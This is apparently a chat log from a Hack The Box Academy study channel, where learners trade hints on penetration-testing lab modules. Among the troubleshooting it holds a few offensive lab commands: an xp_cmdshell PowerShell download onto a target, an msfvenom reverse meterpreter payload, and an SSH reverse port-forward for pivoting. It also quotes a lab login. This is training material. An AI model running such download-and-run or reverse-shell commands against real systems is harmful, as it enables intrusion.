Am still in that module too! 🤧
so the section talks about some of the most commonly used ones
about halfway down the page
is the ping command running constantly while you are trying to kill it?
yeh
try stopping it and then killing it
sudo kill 20 PID
try pkill
might be bc it had a parent process
np
Guys I'm stuck in Whitelist Filters section of file upload module, I've tried the given script and the classic php extension wordlist but nothing
Can anyone help me?
hi guys i cant open sites of any machines
i can ping the sites but cant open in my browser
getting dns error/ nx_domain error
can anyone help?
are they vhosts?
What is the password for the account logistics.inlanefreight.local/htb-student_adm so you can do module Attacking Domain Trusts - Child -> Parent Trusts - from Linux from ACTIVE DIRECTORY ENUMERATION & ATTACKS . I can not find it anywhere.
nobody here is going to give you the password. use your acquired knowledge and tools to find it
okay, so I need to fully attack the linux box to do this exercise? that doesnt seem right?
every other exercise has provided the passwrod within the module
for the user account
i don't have my notes rn so i am unsure
fair enough!
the exercise gives you creds already...
yes to ssh to the pivot host, you need the password for the account shown in all the examples from the domain to run the associated commands
htb-student is not the same as the other account, the other account is a domain account, and from what I have seen one that has not come up before.
thank you for the help! I decided just to leave it and come back though! plenty of other ones to do 😛
anyone experiencing issues today? i am on ACL enumeration and the powerview commands just hangs. i have reset the machine like 3 times already
the powerview commands for acl enumeration take a long time to finish.
yeah it should come with a warning but I know which one youre talking about too, I thought it was also hanging.
its seriously like 15-20 mins to finish
it takes way too long
you might as well watch an episode of kitchen nightmares while you're waiting
Hello, I'm stuck at the SSTI assessment. i can't seem to solve it without registering, there is no attack vector that is not sanitized. can anyone give me a hint where the unsanitized field should be? I also followed the scheme, but it was not vulnerable even if registering and creating a post
Hello, I need help with the "information gathering -web edition" module, in the "Skill assessment" section, question 3. Please!
could someone help me with the module footprinting on the section dns, i am at the last step to find the fqdn for a specific host but i cant seem to find it. could someone maybe point me in the right direction
has nothing really to do with what you learned in this module...you have to view the source code and look after the java script code....
try it...when it doesnt work DM me... I also needed help in that..I would never have solved it on my own😂
im on the vulnerability assessment module and trying to get the nessus service to start on the machine provided and its not working. says that nessusd.service not found
i am trying to start it with sudo systemctl start nessusd.service as the module instructs
um, shouldn't it already be started?
didnt seem like it. i tried to access it at the ip provided and it wasnt working
going to try another box real quick
see if maybe its just a bug
the module says the following:
The VM provided at the Nessus Skills Assessment section has Nessus pre-installed and the targets running. You can go to that section and start the VM and use Nessus throughout the module, which can be accessed at https://<IP>:8834. The Nessus credentials are: htb-student:HTB_@cademy_student!. You may also use these credentials to SSH into the target VM to configure Nessus.
ok NOW it works
mustve been the box
can some help me with the footprinting dns module i tried the hint but it didn't really help
Lol learning about burpsuite and realizing how I could’ve used it to make so many of my projects easier. Instead of manually verifying web requests through inspect tool and other methods
During the password cracking module i have to use credential lists (crackmapexec -u user.list -p password.list). Some are password-only lists, some are user only lists. How do I use credential lists? (username:password) and how do I use CSV files (pass1, pass2, pass3 \n pass4, pass5, etc.)
someone can help with the Firewall and IDS/IPS Evasion - Hard Lab ?
Yes I think I can D0lf, what's your question?
I have run many types of scans, in many different ways. I've run them from a virtual machine and from the HTB instance, but I can't get through.
Can you send me the Q again? I forgot what the Q was about 😛
With our second test's help, our client was able to gain new insights and sent one of its administrators to a training course for IDS/IPS systems. As our client told us, the training would last one week. Now the administrator has taken all the necessary precautions and wants us to test this again because specific services must be changed, and the communication for the provided software had to be modified. AND THEN:
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.
Ah right, I can give you some hints on that (its the Nmap module right?) Mind if I DM you?
Of course, thank u
thank you for your reply mate, now im in the Password Mutations section, i think i will be stuck here lol
@vital adder i apreciate any hint
pivot, tunneling and port forwarding, section remote/reverse port forwarding:
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN ==> this command do i have to execute from the ubuntu server right?
and the internalIPofPivotHost is the ubuntu servers IP right?
Can someone give me a hint (privately if possible) on the Password crack module - Network Services? (question: Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.) - I can't find the username, I tried using usernamelists and passwordlists but none of the combinations seem to work. How do I find the username for the WINRM service?
No, I didn‘t. Are you having the same problem?
Anyone mind providing a nudge on Credential hunting in linux? ||I have been able to ssh with kira mutated creds and found the notes.zip file. But need guidance on how to crack the password protected file.||
Module name: Shells & Payloads
Section name: PHP Web Shells
I'm having trouble getting the webshell to correctly upload like in the module example. I'm changing the content-type in burp but it doesn't seem to be uploading. Anyone else had trouble with this module?
hey im on web requests and im stuck trying to do the tutorial on a GET request for using curl to search for a city name. i get all that but they also say i can go on the devtools and right-click on the request and select copy curl but i see no result when i put in my search
did you manage to figure this out yet?
If it can help anybody with the IDS/IPS medium challenge i just spent 2h desperately trying from my vpn access to send the command. Sending the same command from the PwnBox got me the answer in 2sec...frustrating as it can get. Everything you need is in the "Firewall and IDS/IPS evasion" section
can anyone help me real quick with this bash script in the intro to bash scriping module? i just started and feel like im missing something obvious
I haven't done it but maybe I can help.. DM
Hello, Can't access the root shell in the local privilege escalation Kernel Exploits
@novel matrix
💀💀💀 funniest shit I've seen in a while
<@&861185840277487616> wake up sleepy heads
I'm awake sir 
thanks for report
❤️
hey know im still stuck
no
ok and this is on the GET section?
its the tutorial not the question
uhm did you read the question?
im trying to copy>curl the request in te devtools and use
the
welllll lol i just searched for flag and i got it
i understand the http get request syntax for searching and i know where i would find it
but for the life of me i cant get it to appear
i know its going to be something stupid lol
but im just not seeing it
so you entered the search term right
correct
and while dev tools is open, you hit enter right?
yes
ok standby let me see if i can replicate this
ok thank you
advanced xxe is a mind bender!
so many common applications..
did you try reloading the page
could also empty any previous requests like the module says to do
with trash can
i did that
ill try to load again wait one
lol target is down
one sec
ooo im so mad...thank you
thank you as well
np
ya just need to reload the page and i was good to go
if nothing's showing up and the dev tools say to Reload the page, you should probably do that
^ based
ugh help lol
why is that happening
i gtg if you could DM if you dont mind that be great
dont use caps in cURL
should be all lowercase
from memory i think change the user agent to curl also
i remember the user agent making a difference for some of those exercises
Can someone who has finished the sql injection skill assessment dm me? I have a question about why something worked when everything I can think of tells me it shouldn't.
DM
In the modules, will they set up decoy flag.txt files???
doing one.. says very specifically "find the flag.txt file. Submit the contents of it as the answer. "... I have the flag.txt file and the contents I guess, are incorrect.
some boxes have multiple flags for different sections
but chances are youre just copying the answer wrong.
Aye I got the first flag, second one is the .txt file, maybe I'm crazy 😄
has anyone run into mysql-server having no RC in parrot metapackages, im working on Footprinting -> mysql
default-mysql-server is available but not mysql-server
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package mysql-server is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package 'mysql-server' has no installation candidate
yup same thing here, page loading is slow and spawning of VMs fail
Just tried to get in to the main site and was redirected to CloudFlare. Perhaps a DDOS attack.
a, a vm just spawned
yeah looks like we're back in business
I just realized how important programming is for hackers/pentesters
If I run my hydra on the Brute Force Skill Assessment - Website, and it says it found a successful un/pw, shouldnt i be able to log in with it?
I'd think so
For the Password Attacks module, network services. Are we just supposed to use whatever username list and password we want?
ls
Lols, didn't see the resources. XD Thank you
Yeah the resources will help a TON and don't forget the password mutations
user=user that part is wrong
hello, newbie here. Working my way through the Getting Start module knowledge check and I've made it to the file upload page on the admin portal but the link to upload the file isnt working... any tips?
should be user=^USER^
Hi, anyone knows how am I supposed to access the vHosts in this question?
Time Left: 87 minutes
vHosts needed for these questions:
app.inlanefreight.local
dev.inlanefreight.local
Tried adding inlanefreight.local to /etc/hosts, but it didn't work
Is it failing or just not finding the password?
check if you can edit any of the existing files in the server
sudo <whatevereditoryouuse> /etc/hosts
add in
<IP> app.inlanefreight.local dev.inlanefreight.local
can anyone help me with web attacks - advanced file disclosure?
I'm trying to use the CDATA method but it doesn't work
Thank you
it's because /etc/hosts is basically a local dns if you just put "app.inlanefreight.local dev.inlanefreight.local" it doesn't know what you're trying to do
I keep getting passwords but they are never correct
:F=<input name='pass' placeholder='Password' type='password'"
does the ||html use single quotes around log-in||?
well, i guess that wouldn't affect it
Yes, the exact same error. Don't know what to do
has anyone made or have a link for the machines to do for the HTB pentest certification
to do before exam
on-record the only thing is the pro-labs dante and I think Offshore though I think it's been discussed in #cpts ; even if someone has completed the CPTS exam - they cannot really say which labs do or do not correlate to completing the exam as that is equivalent to saying what is on the exam. :) But afaik as well there are no other labs or anything that are actually required to complete or anything, the module content should be enough
Yes, that's why I tried adding inlanefreight.local at the first place. What I didn't know is that you can have different FQDNs mapped to the same IP
yes they just need to be separated by spaces
@main ridge they can be on two separate spaces as well;
<IP> subdomain.sitename.com
<IP> othersubdomain.sitename.com
Yes , now that I'm reading the following section (virtual hosts), I'm understanding why it's possible to have the same IP mapped to different FQDNs
yeah I feel like that should come earlier
but they are at least expecting you to know the basics of
<IP> example.com
for /etc/hosts
if you still need it remove the first 17000 password
yes but the other interface on the ubuntu servers
yeah this module has a lot of credit REUSE (To make it easy)
what method did you use? the crackmapexec one from the example should work fine and it will be faster if you do it on the pwnbox, but the F ing cme on the pwnbox is now updated to a unusable version (i think i was for smb) so if you do it on the pwnbox and have issue with cme there should be some old message of my helping someone re-install a old version of cme
because most of the section is that module is using the same target machine you will see thing like that but that file doesn't have anything to do with the section you are on, your target is the will user
^
but yes that file comes into play 8 sections later LOL
so you saved your time of ssh into the target to begin with xD
Did anybody completed 'Introduction to NoSQL' In-band data extraction and could tell me what do I do wrong?
hey @vital adder you've done Password Attack yeah? I'm meant to mut the resource provided list with the resource provided rule as that's the ONLY info I have yeah? (And of course bruteforce the Service with it
if so I'm gonna go watch this paint dry rq
can someone bump me in the right direction on "AD Enumeration & Attacks - Skills Assessment Part II" Q:"Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host" I have the creds for the SQL and have enabled xp_cmdshell. Tried to upload a "shell_reverse_tcp" that i created in msfvenom. Tried to copy it with the following "EXEC xp_cmdshell 'xcopy "\172.16.7.240\compdata\help" "c:\users\public\downloads\help.txt" /y' and getting "Invalid drive specification" there is a smbserver and i can see it is connecting when downloading the file. am i going at this the wrong way or is there a different approach to get an interactive session on this machine
I am just wondering in general when doing sqlmap injections, is there any way to know which tamper script you should use or do you just go blindly 😄
you can add threads to your hydra command with -t i think the default is 16
I managed to find the answer! Nowhere on the page did it mention the resources, so I used the lists in Seclists, which yielded no results and cost me a few days hahaha thanks for replying though!
Just a quick question, would I by any means be able to learn hacking in 3 days,, and be able to get my exam questions from someone’s laptop, or is that far fetched
Generally if there's a provided resource it's meant to be used especially on the skills part
F in chat
No, there's a lot when it comes to hacking, and getting exam answers from somebody is cheating so that's also a no. There are no shortcuts to learning a skill
So.. I have to study.. yeah..?
Yeah
Using the supplied password list will save you time and frustrations
I am sorry but no, i am in cyber security sector about 1.5 years and i still need to know a lot of things
Exactly; things are constantly evolving
What if I ask someone to do it for me.. I’m certain my university’s security level is the weakest out there
For the skills assessment I should also use the william.txt one?
oh weak credentials ones
If you are looking for someone to hack for you, that'll be a no, and against the #rules :) you're more than welcome to give https://academy.hackthebox.com a try if you're really needing to
Tsk… just.. joking.. haha.. but if there’s a real good hacker here without ethics hmu
I’ll check that thing out too
Just study and you won't need to waste money/time/effort on cheating
Thing is, I studied, I just know my professors don’t like passing students
Because if you get caught you'll most assuredly get kicked out if caught
That’s a point, yeah
Take that up with your education board or head of school
Not our problem
tfw I get to the end and the lab just dies on me 
yeah i did see someone mentioned this to one of the staff a while ago and not sure why there is no update on this yet, also one of the issue in this module if you are brute forcing through a vpn it's going to take forever + the target machine is unstable lately so this may cost a lot of issue
But I'm meant to brute it with the user they're asking for, not lateral movement?
ohhh so you didn't know there is a resources
because if so
aggressively
i mean using the the 2 wordlist is the intended for the one of the first section but if you can get a foothold with one of the cred you can just get the username from there
is there a reason to ||mutate|| it?
i mean that will give you a way bigger chance of getting a hit but longer brute force time
this is better for brute force hash
ty I'll try bruting the ftp with hydra again but the first time I didn't get any cred with the provided lists
if you wanna DM me any other tip or trick that i'm just not thinking of because i don't want to lose my sanity over this
:)
i got no note on why i have to use the given shell but i did in my note so try with the shell from wwwolf-php-webshell and for the content-type did you change it to the answer for question 1 in burp?
oh wait which section are you on?
if you're trying to access it; make sure you also access it via the name you gave the shell :)
the first skill assessment
easy
🙃
the majority of pw attack was simple just do the thing and it be happy
oh hint this is the only assessment that you don't need to use the mutated wordlist

but i guess that will work too just will take a good while
but I can attack using root? or is this a lateral movement one?
no idea what you mean by lateral movement but for the root user nope this machine have a different set of cred
get access then find root; was just making sure that if it was REALLY necessary attempting to just attack via the pwnbox
also that would probably explain why I didn't get creds :^)
hint you are in the right path but i got 0 idea how the xp_cmdshell work with EXEC for me i just use xp_cmdshell and powershell wget to get the shell on to the target machine after that use xp_cmdshell to run it so 2 command
thanks MRtom, wget was the clue that i needed. EXEC xp_cmdshell 'powershell wget http://172.16.7.240:8000/help.txt -OutFile "C:\Users\Public\Downloads\help.txt"' it worked like a charm😀
oh yeah i did help a few guy that misunderstand the same thing and i think they should add a note for this for change the question to get a foothold and PrivEsc to root or something like that but nope you have to get a foothold from mainly brute force and PrivEsc (sorry for the delay i forgot i was typing)
all good; I've got the time to wait

Hey MarcieLee,
For the second part of the brute force web assessment. Is it correct that you should use rockyou-10?
I'm doing the metasploit module in the HTB academy however I cannot seem to find an exploit to obtain a meterpreter session I have no idea if I'm just missing something any assistance will be greatly appreciated 🙂
i would say if you need to use it at all then you would go base on the error it give you like if there is a type of filter that need to be bypass with one of the script
which section are you on?
section 414
i mean the name
oh lol sorry using the metasploit framework > meterpreter
like always i just note down what to use not where to how to find that to give me a sec
hint scan the target machine to see what application is running and if you can which version
and find an exploit for that in metasploit
thanks tom 
don't remember ngl my notes are kinda trash for this module
@vital adder 15 minutes left; let's gooooo
I ended up lowering my threadcount because I believe that to be the issue; it's attempting too much at once
Hi everyone.. In sqlmap essentials - Skills Assessment: I found the flag but when I write in HTB it says this is wrong.. so weird. What am I missing?
dmed @vital adder because it was indeed what I was thinking in terms of why the password wasn't found i was trying with 64 threads... but it was saying "x did not connect to host" dropped to 32 and woo
Are you doing a --crawl ? So it jumps to other pages and outputs flags from previous section?
I am assuming you are on the case8 or something and it giving you flag2 instead of flag8
but waiting to see if it finds more users
Hi thanks for replying.. I am in the last section.. I opened the exact table for last section
sad ... ngl imo the labs of this module are not super useful
actually they're super useful idk what you mean by not useful?
yes but are you doing a --crawl command in sqlmap
it teaches you how to brute passwords and utilities to adapt a list to match password policies... using tools to actually crack them
also teaching on the patience part of hacking
also adaptation
"hey this method did not work; let me try this"
Yes, but because of my job I have a tight schedule :p. Guessing the right wordlist and waiting to succeed is not the most useful thing to be learned
Well in this module for most of it the wordlist is given to you; however there are times where you need to use rockyou.txt
true that the hydra commands etc are useful, but bc of time constraints irl I don't think these modules are extremely useful
but in most instances where a list isn't given; it's in rockyou
can you not do these modules outside of work?
or I'm not understanding what you mean by time constraints with work?
Most of the time for cbbh is ofc outside of work but I'm still on a schedule so to say :p
The only time i was on time constraint or the output taking long, was when you need to bruteforce passwords, but I've learned that if i just remove some inputs from rockyou, or if ftp is enabled you use that instead of ssh, it speeds up password cracking from 50minutes to less than a minute
When I try --crawl it doesn't show anything.. But I don't understand since I opened the table final_flag and got the flag.. Isn't it this flag?
oh you're in the skill assessment
yeah, the second part of the website skills assessment 🙂
maybe I fucked something up with the hydra command. Because I would think it would finish rather quickly normally
i'm trying the Password Mutations module but when i run hydra i get this error. What that means? Someone help me?
"Error" all processes were disabled due to too many connection errors; it's basically saying that you're not able to connect to the host
so next questions are: are you connected to the VPN (do you have a tun0) and is that the correct IP
hi everyone
Haha I had the same problem spent way too long on that section, then I used pwnbox and I got it in 5sec
yoh is it normal for the spawn targets to be laggy in the SQL inj fundamentals module?
always have to reset the vm and refresh targets ip, mysql is not connecting even after a minute of wait lol
ugh Password Attacks Medium Lab is killing me; i made it to the second user but not sure where to go from there...
I have a problem and I can't find the solution. So I'm in the Getting Started module at the Web Enum part and in the question we need to try web enum techniques on the "server above" to get the flag. So I tried the domain mentioned http://10.10.10.121/ but with the pwnbox and the vpn conf I'm not in the right network so I tried to change the network but I couldn't reach the domain so I'm a bit lost to what server is mentioned to do the task.
give me a moment sorry i was doing a practice lab
that's the server they are referring to
the target system you spawn
I already try to spawn the target but with or without the vpn conf I can't ping it
it spawns a target such as x.x.x.x:port correct?
Yes
that means it is a docker container; purely a webserver that is not meant to be pinged
:)
visit the page in a web browser to confirm it is up in these instances
or use the other tools such as whatweb
or curl
Module Pivot, Tunneling and Port Forwarding, section Remote/Reverse Port Forwarding with SSH.
anybody an idea why this error occurs?
Thanks i copy paste the ip:port in the browser and it works
then everything in this section should work as intended just replacing the 10.10.10.21 with the ip:port
Can someone help me with Initial Enumeration of the Domain
(in AD enumeration and attacks)
and the scan question for MS SQL?
Only 2 machines answer in my scan from the 9 IPs... Even when I enter the IPs in the answer (kind of cheating) all are wrong... ?!
Hey guys! Need a hint on Broken Authentication module
it's better if you say the module and section name rather than the numbers because no one actually pays attention to those
It helps to let us know what you've already tried so we're not having you repeat yourself
never mind. solved it.
@vital adder I managed to get it done thank you for your help i really appreciate it 
Broken Authentication module and Brute Forcing Passwords section:
Found which policy of password creating this service uses and filtered out strings (from /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt) that don't respect it but passwords I found don't fit anyway
Marcie thank you for your help too 
so what command did you use?
sometimes you can get false positives; try a different list if one was provided
but using this wordlist is a part of the task: "Using rockyou-50.txt as password wordlist and htbuser as the username, find the policy and filter out strings that don't respect it. What is the valid password for the htbuser account?"
ah then idk i haven't done it
but perhaps you have an extra space or the copy added some weird characters
actually the task is pretty clear...I can't understand what's the problem:)
Usually modules from the academy took me less than a few hours to solve... BUT I've spent already more than an hour for this section
solved.:))
I understood that's the problem...
Maybe take a break 😅
Hi all,
I'm in the Password Attacks module, Pass the Ticket (PtT) from Linux section trying to get the credentials for the user svc_workstations and use them to authenticate via SSH. In the crontab I found the svc_workstations.kt file and managed to extract an AES-256 hash from it. Now I'm stuck trying to crack it. I've tried CrackStation but they do not support AES-hashes, then various hashcat modes (17010, 19700, 19900, 1400 and 26403) but it doesn't even let me run most of the time. Usually stating the error "Separator unmatched, No hashes loaded". Can i get a hint please?
😆 yeah, definitely
what happens if you let hashcat auto detect?
might need to clean up what you're feeding
```
┌──(kali㉿kali)-[~]
└─$ hashcat --quiet "0c91040d4d05092a3d545bbf76237b3794c456ac42c8d577753d64283889da6d"
The following 8 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
1400 | SHA2-256 | Raw Hash
17400 | SHA3-256 | Raw Hash
11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian | Raw Hash
6900 | GOST R 34.11-94 | Raw Hash
17800 | Keccak-256 | Raw Hash
1470 | sha256(utf16le($pass)) | Raw Hash
20800 | sha256(md5($pass)) | Raw Hash salted and/or iterated
21400 | sha256(sha256_bin($pass)) | Raw Hash salted and/or iterated
```
careful with spoilers
Sorry, will hide next time 🙂
Can someone give me a hint with Attacking Common Services - Hard I'm kinda stuck on it for a while, I was able to impersonate then find a DB which has user that is supposed to be an admin, but not quite sure how to move further than this.
PIVOTING, TUNNELING, AND PORT FORWARDING, section Remote/Reverse Port Forwarding with SSH:
my multi handler is not able to make a connection...anybody an idea why...?
@timber hatch try with sudo
tried. but did not work
I mean I can go on I have answered the questions.... but somehow I still want to manage that...
are you sure that you can reach the 172.16.x.x subnet address?
i was able to figure it out. don't spend on replying 🙂
but no my multi handler is doing nothing
i have a feeling why...
once to twice a week such a request
@autumn pilot 
could i dm you? my multi handler is not working....
the exercise is based on what you have learned in the section of the module
if you have your payload already uploaded to the target ubuntu machine, then you first must make it an executable there and secondly you must ensure that the listening IP is the appropriate one as well as the port that you have specified in msfvenom's command
Is there a way to close a target ip in academy? It says I have 60 minutes left.
you can refresh the box and it will give you a new target if that's what you want
at the windows host i have to add .exe to the backup file, right?
at the ubuntu server the file does not interest me, right? but there it lays also with the ending .exe. but that was only for the transfer to the windows host, right?
are the ip set right in these commands:
msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.129 -f exe -o backupscript.exe LPORT=8080
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.68.157 -vN
?
no idea
ok. thank you very much. that helped
no I don't want to refresh the timer. I want to close it down. I'm trying to start a lab on hackthebox, but keep getting an error "max machines reached for this lab". So I was thinking that the academy box is making this error
do you have a sub on htb?
for academy?